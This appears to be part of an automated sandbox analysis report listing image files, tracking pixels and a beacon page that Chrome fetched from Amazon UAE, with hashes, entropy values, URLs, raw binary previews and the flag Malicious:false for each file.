                                                                                                                                                                                                                                                                      Size (bytes):4816
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9131332185751475
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:JBzv1Lr0xgoQC5k5pCNa+E7MTRc3drxQFNrIIQ1YHrR:TNLAxDG5cNapw2trOrEER
                                                                                                                                                                                                                                                                      MD5:6E59EDC6DEEDB38F497622893AB541C8
                                                                                                                                                                                                                                                                      SHA1:1BDEE947D4927635FE9B52B9F31E026C2ADA0B19
                                                                                                                                                                                                                                                                      SHA-256:2991825E35819E2768DCFB7861227EE717365369F52C07D06B96994D0CD533FE
                                                                                                                                                                                                                                                                      SHA-512:D632915EBD23D699773A3A38B6FCE6C20A16E502036C89CC3C7F29BF6522DDBDF84757037E25316161556447112B155F5BB505D62DF1F1978AF6329A36887940
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................%... ..#.%.%$$&)*%.)8...........#...$...+$*.$&$$./$*#$.%$. .....$.&&%..&#.2...$#) .&-......t...."...............................................................!1..AQ."Ra....2qr.$36Bs....#b...%S...................................................1..!.34ABaq....."2Qr.RS..............?...E..+.E.QX'.B..I...[$y..J.*/6...N..W....h.o.J......F@."~..N.|...r....O.4.g6.......?.c.|..?.XZE.Ri2H......N.....]B)..F..c\L..;.j.....w..CWN&......T.......j.n..$..?...lpD.5.K.l.%l.`.G..+...z..#*.h...........c.c^*}:..(.|{.".q.6....m..~Z>.[{o._...~$....F..1.8Q.6..i.H.y.N..<.,{@.*.f'.....S...3...[.e..=.*w.......k..m.....W.....K...s>.r:...6..A.......2|9.>..MM.Y.4t.E....y.n.......U_Vm.....I..m..~Z..f...F.H..JQXers.u>.,Z..w.B."]..(U.N:..[a...Pnnt.SU....wh!....J}Y....-..-.....W..o....n......P......D`.B..\2...h.lq....F...D5QM##...>.VG....>+.."...Yc.v;...8.r..E.I..,..5..~...2......WL..r.&.A.r..ki%....w`..$.t\..U.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6523
                                                                                                                                                                                                                                                                      Entropy (8bit):7.8495395871522815
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TKoGAqaJn5nJG0zE8W1AMzWo3SSpeY8uBTNP5rhGjxcF6DiEC97l8pi8o6PMm5Wv:rx9rn3zJ8zp3vBlrhGxccIMizWBFTs
                                                                                                                                                                                                                                                                      MD5:8B400EB87566C99F56B9F28F5EB5269C
                                                                                                                                                                                                                                                                      SHA1:48DACF11E30019D5BB791F77BC910A49DF7E823A
                                                                                                                                                                                                                                                                      SHA-256:C219AE79A407024EBFCA7E81B1946EE393AF6DDB78D42F2616B8ABDB5EEB18FE
                                                                                                                                                                                                                                                                      SHA-512:2E1391212BFD4A111A14A1F56C523661ED78F2E2E84B8898F2BB1C9957919AA6823D480B482F8EA09F5FA94B5DDB92F6B0778E44F36C18361ACBE21D27AAE971
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`........................................R)%6QK.....&..".&...J....I.Qv.U...............i.t:..">......~n..a..N.O..v......k....|9..7..<._.....?........W9.0.v...j..."....m...[[.=.........^....z=............#......f...6.....u..{n.9.u.".k..B.....+......;m]..5?\.5.D......L.{N;..k~.k...G..^.F...'1..;..9.:.'......s{(.e./....~X...s.!........rlE.o...F.8ogs.:..O}......."..1.M];.b.V.;........?...t_|G......8.E2.-..#._u._>..f|/sM.E......R.....fk..a.rQ....T].Q...0...c.y=Y.da..F..da..F<...@.................................................................!..012.."#43AQp.$B............ld..X.!y...^+.[D..../6..3xp./6.y...A....O.}Ny;3Y...m1.=o..^k2.aW..._P}.:S.2.q...7. <mC..t.7.......DO.(.j.d./Q.4#..aXp.O8.V.S.n..ca..\.Z'..)E.'...0..k..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://aax-eu.amazon.ae/x/px/RPrmAvHFWszG-tGSlwHHbCQAAAGRdjLjogMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICBStrp9/atf/%7B%22atf%22:false%7D
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x315, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):29554
                                                                                                                                                                                                                                                                      Entropy (8bit):7.982066146905835
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:0rlLcQrgGmpgyh7fTfXVdJZZm0KPWFRtBm:0lFUGYgQbjb/Zm0KPW//m
                                                                                                                                                                                                                                                                      MD5:075EA40CA67B8C4471FF816FAE6DCF6C
                                                                                                                                                                                                                                                                      SHA1:E8C365E97EC978B3AF5AF66D95D03AE270751EFF
                                                                                                                                                                                                                                                                      SHA-256:C9FFDD91A781051F15A5DD99C0AD81FF98E824D152914066A1E2406FF1F3D162
                                                                                                                                                                                                                                                                      SHA-512:C99303C8BEF9B48FAFC2DDEEFE5519784247FC7EA34ADAA748B1F852152BB712313E744E61FAEAB39253107869364F905E7D3FF20204940C46CC9F99C90A0720
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......;.@.."..........6...................................................................i).JD..$.z.y.<IGs.q..5V$..$..%"IH.e.;..p..%..{.;........r..O..?l3...|$.........}...V_....}...q.r..)[P..........q4w<......:.....U..K.w6.y.P,.?...lO.S.}...b.M..=..u`.g....+..0H4.T%_.j`..fD..=.4v./.4+.72.k .7.v......../l.....5%.O3!.K.I%o.%".,.z`..C..Ln_9.K.^.8o.+WcU..U..j.....fr..%.1......x...r....3tU..o....aX....a...}i...\u..*....p...2....wj.(./o4..B...&...Y.......,%.Np.k..j.I....Z.........Z..'!"9>+..$<...wm.k..X....%...'}OV..1y.z.L7.E.3..h8~....s.X..J...h<...$.Q...9.]...)].:3..].>..J...h....~.]0n.kd....X^*R.Rz*....tM'e.(....j.(...Fg......F8d.'x..l.9...G.('.P.]..a.1.^.S.K......X..YV..:C...~(+........0.^..N..KW..i\..W...\..*0...{V^.u...x4.2...M.....2.....OP.[.+(.....3..R....7.T.....*..C.DL+.?.y...n....L.]......Lf
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:PNG image data, 400 x 900, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):16237
                                                                                                                                                                                                                                                                      Entropy (8bit):7.914373477606932
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:uZUkQ4lr5sLQMaphjMr2VqWT33ZoXgsICdjyt8bpBXG8OfQwZop96OJ+CTy5:ui4B0arXq8ygCdjTHWfQ8opRpy5
                                                                                                                                                                                                                                                                      MD5:52B8D386D2B1D407C71A4AE966B61ADD
                                                                                                                                                                                                                                                                      SHA1:B962650FFFC15637F0D9F57C332702459F084B7B
                                                                                                                                                                                                                                                                      SHA-256:D47C1E50DB91BB597B75EDC63362CD0C568E4F5F15A3F8BE1B6ADFF24E89E447
                                                                                                                                                                                                                                                                      SHA-512:C6B69AF93D0683324A86CBEE5575E42A293C8588267C49034D1CC9AB3635034897838F9D5EA665B694C90D72CFE2B3F462CAD907CC74749E9AF863A90D233998
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR................Z....gAMA......a.....sRGB.........PLTE....j..j.....i....fJ.nU.....i.....j..j............._bg[ajD`e.k..j..i.. ..i....\..i."'+.j.......j....................i.&+1otzMT[.i..........NSZbgl.i.jpw..E.... ...HOW.....j....bde...KQY........OTS344^ch....j.........adh............2.....eefZ`f.j.......{..{..ejr..........s.........i...biq`fnOSY....................fff.....f...........w.!!!fff...bhp.u..u..Y.'..PUY.....488.u.588.H.........F..............c.../.....tz.............1.................J.!!!..c.l.......q.m..v;d..D..Vx..../8A......#*1/8@.....\333...`gofffPW`.....%......KR[]dl.u.dkr.....dT[dX_g............kqx................7>A.].......Y..<........+4>.j..................}..UUU......?GP.{.............uK....7.'..rx~..R../~.....y.s.....%....W.........t...Y.{{I...YY...........tRNS.A4............b.H..[eo6..'..Q.......Q....a.w...`....w.a.A.5...q/.{I...e..X.^.......p....q..~......R.w...6........Gc........|......Z......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 440x350, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):40824
                                                                                                                                                                                                                                                                      Entropy (8bit):7.972918402031387
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:PIEWtLUl0bEG5XzkDcWHSAosA9Lh1NXFhFMnrWthcv71uVeH1GbYZOtzvO:PIRtodQWPop1ZfFkrNuVeHo/tzG
                                                                                                                                                                                                                                                                      MD5:5C00307E6EF1611FA0A535757BA0E19B
                                                                                                                                                                                                                                                                      SHA1:A6DB08E03C484FD64CD6A39E6621A9ABF747F282
                                                                                                                                                                                                                                                                      SHA-256:6491647E823A1B420EB030E5F467583DA600350F80AEDBC8513546971CAAEF44
                                                                                                                                                                                                                                                                      SHA-512:816780D4FC4D7B6E0629B2C8950A9D500F7A3D8FF5C73453BA05942B5341BC940D4C0D5F2257B62A77A7AD9830183C396417E952638B2BAEC48F9A626B8F6266
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/home/store/furniture/Garden_outdoor/New_L2/XCM_Manual_1270036_BAU_AE_OHL_L2_NavTiles_Gardenfurniture_440x350_En_619339a7-d8fc-4bd3-96c3-39cad0faa72c.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C............................................!!$$!!0///06666666666...C............................."......". ... .%%""%%//,//6666666666......^....".......................................S........................!..1A."Q.2aq.#B....R...3br...$CSs..%'4...&Ddt.......57c................................5.....................!.1.AQa"q...R...2B.....#3.rb..............?.s.q.)....x<...2=.9UB........j.q....g.........,n#U.......p3U._.x[....k...u...Q.#...<.j@3.~x.%..F.y#.+L.Z..vfb..e..G)I..A...|~....7...4...g.s~(......7...wA4....,....L.$....cY^#.>..8..X.N.ad1........9..J......mZs5.=............sJ.^!.(.m.e{ .2."...".wfVB03..W.xm.EJ..w..f......}.....@.[8...=..j.&.A..U.<.p......."+XX..@....1..Z...|]#.....Yd.....C..8.}.U......kCob.f...#.YY..t.C1.....%...:[.'.....e....>.ck..#...e.1}........ekO.....Y.-...G...|.`wB...}...|n.s.#..N_....Nt.ep..w..k.^.M....C.."(.,|.BB.m.$......Rrw.&...Z].J\..w^....X.D..v...e.^......3...|.u....rF......6...y.f..Mi-.DZ.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):71
                                                                                                                                                                                                                                                                      Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                      MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                      SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                      SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                      SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://www.amazon.ae/rd/uedata?ld&v=0.295396.0&id=SX0TR1HXR3TVBG1JQK3B&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=SX0TR1HXR3TVBG1JQK3B&ue=20&bb=68&ns=152&af=257&ne=275&be=1283&fp=190&fcp=190&pc=9561&tc=-1715&na_=-1715&ul_=-1724264966840&_ul=-1724264966840&rd_=-1724264966840&_rd=-1724264966840&fe_=-1712&lk_=-1691&_lk=-1691&co_=-1691&_co=-904&sc_=-1684&rq_=-904&rs_=-69&_rs=706&dl_=-52&di_=1345&de_=1345&_de=1351&_dc=9560&ld_=9560&_ld=-1724264966840&ntd=0&ty=0&rc=0&hob=19&hoe=21&ld=9562&t=1724264976402&ctb=1&rt=_af:5-2-3-0-2-3-1_ld:78-8-5-58-8-4-1&csmtags=aui|aui:aui_build_date:3.24.6-2024-08-12|mutObsYes|ewc:unpersist|ewc:unpersist:emptycart|ewc:bview|ewc|ewc:unrec|ewc:cartsize:0|ewc:aui|navbar|aui:css:cache|aui:js:cache|mutObsActive|FWCIMEnabled|fls-eu-amazon-ae|perfYes|fy_cdn_fr|fy_cdn_mp|adblk_no|aui:sw:page_proxy:request_feature_tags:timed_out|supports:mutationobserver:true|supports:getelementsbyclassname:true|supports:map:true&viz=visible:20&pty=Landing&spty=BrowsePage&pti=11601212031&tid=SX0TR1HXR3TVBG1JQK3B&aftb=1&lob=1
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):46700
                                                                                                                                                                                                                                                                      Entropy (8bit):7.960246636433795
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:EqGD12d5gZudHA7yEVMHGnS269iQY8+atziXfOk5KOG/eVTFqk4BtoyMOceBoTsr:T+wvSudIVtX69tfXtza6GVT/U3MOlAWn
                                                                                                                                                                                                                                                                      MD5:73BF02EC9AF81603DEE9C04E27F7BF05
                                                                                                                                                                                                                                                                      SHA1:CCB92232BA00CFDEC7D93A55FF77C8312B1C0B16
                                                                                                                                                                                                                                                                      SHA-256:8E15B97B8A683E66DAFDA92B78A9DC120442425E3649FC95A19B07590349D814
                                                                                                                                                                                                                                                                      SHA-512:48BB7C452C47E3F9FBCFEBE41FCCDA62912FAFDFCF89EE62DE297564B376BA4480AA6ABD3ABDEC7A7DD173964F739F39267F0C6C326469DB316C4C8F5F608E16
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_CL_Babyessentials_400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d.............................................................................................................!1..AQ."a..2BRq....#Ur...$3Vbt..........67CSTcs...%&u458DEv......e..........................!.1A..Qaq."2R.........BSr.....#34Tb.....5c..$CDs%..............?.....P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...........P..@(......P..@(......t.zP....4=..7K.6]O.e....;moW..).W.)..Yy.....O.,.\.Gh(yL..\W.T.)i.....~Eg..C.?.........&.-._.Q....Jm.q....2......j...R.u|...a6...S."=+...x..%.2|6......?5d....w.o.....'.v......~.....`...T..W/[...../,...?;<........<.Hc...W.&r..S..}..x...>..n)'..+.......c....?..r../...[...............mY.%0.td....<<...?9...cY4@.m.HH.P..Q.{...j.NF._.9.3..%.Q{....I-.."...t...Y)s.B.G....}......DI.o.........%).&M.j..Dg.......)...).....Q......'v.U....-.$.......w..V....(~...j~.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://aax-eu.amazon-adsystem.com/e/loi/imp?b=JP9UG7VQZht7NRTb3weJQcEAAAGRdjLk2AMAAAH2AQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICAysaqX
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5219
                                                                                                                                                                                                                                                                      Entropy (8bit):7.924914378781534
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:7eBgNcDKEF/crsbmRXgetHpOrYB2LjCDwcmOQPiyiZXt6hbLfqCw0Bm2Z/x7:KsqB+ZBtHosij+wJOebLChfQ
                                                                                                                                                                                                                                                                      MD5:A5F05A5FE42F6BFD5A4EA8FF080B4C50
                                                                                                                                                                                                                                                                      SHA1:0897A471D2B505092195E44AF5850EB1C63F2950
                                                                                                                                                                                                                                                                      SHA-256:292E3CACE8B7F90FE79A7DDA202A2E86890DCEFB2C83221C2FDCB416E19196A5
                                                                                                                                                                                                                                                                      SHA-512:143B6D2438938B465B1E0DBFF725444984EE155EE2E361D05B9BCBCD88A95D33C671488016392C77D236D49B3A1A52893C92980BA08E1741ADC818AFD1E16DD5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1746405_3944619_186x116_1X_ar_AE._SY116_CB567106849_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..............................................................................#.......................................................................t...."...............................................................!..1"Q.A..2Baq#RS.....3Tb....$r..4Cst....................................................!.1Q"Aaq....2...$B....R................?..dSH.Ji..I..a..Ey.7...>*\Z..B..V)dPK6N.V.......3Ts.s.}.....6.]Z..z...........L6..5.....|y.$|~x.2....6.l...[z.w....9d..U..2E.......c>...........D.[...~Y<WR>..L<Rj.89.A....s$..SDp......%.\...........3V...q....j..KN.m.>....f.}YY<..*..Zn..iO..m%.ng...!..z..3.q.9..[6.+.^..>F....?..p_.m..t.-^.........YQ.s.V/]ZZ.=........."gfT....z.:_C....E.hcmB.w.&p....a(.0........."H.......C.C... ...;.......Z...+..~.?...JE...>.......Wcb...../..=.d2...?K..k.K.VM.......{u......./.j.=.....oH.......^[.(<.,.CV..J.....=..-^.|D..#=....;.o.O...Z.~..kM.Rd<.Sx.[....._.X.;P.O.>gf.(....(....M......sa..@.j..F.G...aR..f..\..\.9w.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 392x90, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4736
                                                                                                                                                                                                                                                                      Entropy (8bit):7.95242931081788
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:wREimuNuaqF1DPyEJtml4viwMIFxKC1l+MEP5A5WN3vdrA59G/My7gAQu:DixNdqP7/Jsl4xfKCiMI5yWRhAS/MbAn
                                                                                                                                                                                                                                                                      MD5:2E99682AB0B9785ECFEDC4274F8FF4BA
                                                                                                                                                                                                                                                                      SHA1:A466B0FBC4979016D4F5B98575A54C44AC71517A
                                                                                                                                                                                                                                                                      SHA-256:F0A6A25B9317FB1CCDE1AE579721FE670D31BFA592F4E55D93811A3025579440
                                                                                                                                                                                                                                                                      SHA-512:38FE766300FD14F749ABC00DE9D7F1A329652F39FB60F26668952E9B50FCDD9F61B2E93F9DADA4B6A839057BFB1E13276C561973F24AF9276E0493058F866F84
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/7c0c795f-4611-4e55-9ae6-d19245573000._CR0,0,600,100_AC_QL95_SX728_SY90_FMwebp_.jpg"
                                                                                                                                                                                                                                                                      Preview:RIFFx...WEBPVP8 l...0M...*..Z.>...A.yW...8.....o...=.W..".....f...~....59..z..?...?........O...w..._p..o............7....................@..........z.~........#....g.?.o.......?.~........G.w.....~E....z..s..|I}8.g......]....K.../...q...............9.../...<1?....5.'.O...~....c..............c...O.c.w.L..BB.Zi...?t..'.p..pl...u.z...iD..?%.y.....-.......I]...t..f.....C.|.../6.XT.en...2...`KP.p.@C... ..-f..?.....#....2+.o..h.......N.y..A.bd4yf)Y....M.`S......>.".6.....{*s......D&65.9.6n*k....*.l...;..v@..MlEh.wT.-G..+OU....?G.H..f..W........u.+.,.R...6...].~%.J\..H5.-..G`.....3.Q.....6.>..X...zK...w...v?....CLZD...y....|.5..-...Y...`......~...-Qjm.L).....C...M.F2......;.*R.2..=x..^0.FJ...g}.{g...F.0{U.."....}X..6...B.P....b.T;.W..N}...</.!.G..h.o....4..&..jR.Q.=h_[.@..g..MU...m=..#wz-qc?.!.......@..8...M.-.v.e8D.H.g.,y.........~j...yD.....H.e4..C........D."G5.......R.6"..9..I5....H!{1.....Wp..........n...e...k.._.Kz..B.(....\.,e...dD.VI.L..I
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):26626
                                                                                                                                                                                                                                                                      Entropy (8bit):7.969779131701919
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1l4+lHlWipSlf363abYZdHqe5lQeRX3r3iDMjwJe:X4ml4J36qQ/NbSDML
                                                                                                                                                                                                                                                                      MD5:ED2B9BA59B306A16CF38431EDEEF4D04
                                                                                                                                                                                                                                                                      SHA1:01CCBACA8D90FF27E99828401809DF3B3B266A33
                                                                                                                                                                                                                                                                      SHA-256:4B34B7AA79D0C6688D13E2CE4D339280DF7803B20452C66C9473F0B76E4877D4
                                                                                                                                                                                                                                                                      SHA-512:665AB96F49311BA180EF931C0BAC738F3739258552B4E408F2867D5466F3534177796BCFA6CC90D006B696E5C76BC05EF2B7F86A62C62477534D3E6A1DE6B10B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#.............".................................................kV*.....S...rk...t4sg....%MS.m8.R.Y.;0...l2.~}._+D=...R.^l.6.|..z.V=-SriM...6.k..SJ..Vb....>.SQ..nv.%....c...TN.ikV..4[.R..T.o....k.T....,Sh]....b.....".Z5s.gGG...gW..oK.......mb.nf=lS.Dn...ZE..v....v|?...#...C.6<...7SjY,.w..bh....M.W>.'..6.>1..}'.=Mi..]..mK!...u1TF.Ik.c,.V....6...x....?CRy.f...Y.7=.K..v..2..,.9..|.1.3....O.$...U......u^.F.D]...[...E0./..4...=..h.-.n.-....g..j.r.....59...)~w.{..q..u....R..=....vq.5k.M.2.....k..t{.F.}..O2...v[*UZ3...uV.1.Z..i.Zb._...w.9.6{o..+i...}w].Uo...j.\b_E..~..J..|w.............b_}.S+....V...4..(.6.r.._.{_R....=G..>.....}.Si./..}6..1-.)....J7u,..Y.........}...B..y./n.!.?..J=.....b.].X..Q.k-B.......A.~u....u......7..;Z{^..*jZ.F.,_U*...+....|...=...7{&.....e~M...~...-...gq..Fm.U..n.:....:...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (582)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):29992
                                                                                                                                                                                                                                                                      Entropy (8bit):5.302112970320793
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:w6e443sqMQCdnf5NW7mnWJ1pq/d5aaYjMgctsUvByiCiFYrvwk:w/4ffe7sWJE5rtsUpyk4
                                                                                                                                                                                                                                                                      MD5:571E10191E59134E8902CDF0F81747CC
                                                                                                                                                                                                                                                                      SHA1:6E8CA559371BF536FF98680CDD39AA29F60C129A
                                                                                                                                                                                                                                                                      SHA-256:D8A082163AA29448AB65E7E318CD714BF680B6DB9654E7D5FB2E3BB5A7FDDCA8
                                                                                                                                                                                                                                                                      SHA-512:031BB62ABD51F704E15E23D823269C78C2C787F43C28B75DCE551BBA7DAE63411B82A870399532C0E14B7B827BC69207D37BC83D859A37F6E018021B386ADBB3
                                                                                                                                                                                                                                                                      Malicious:false
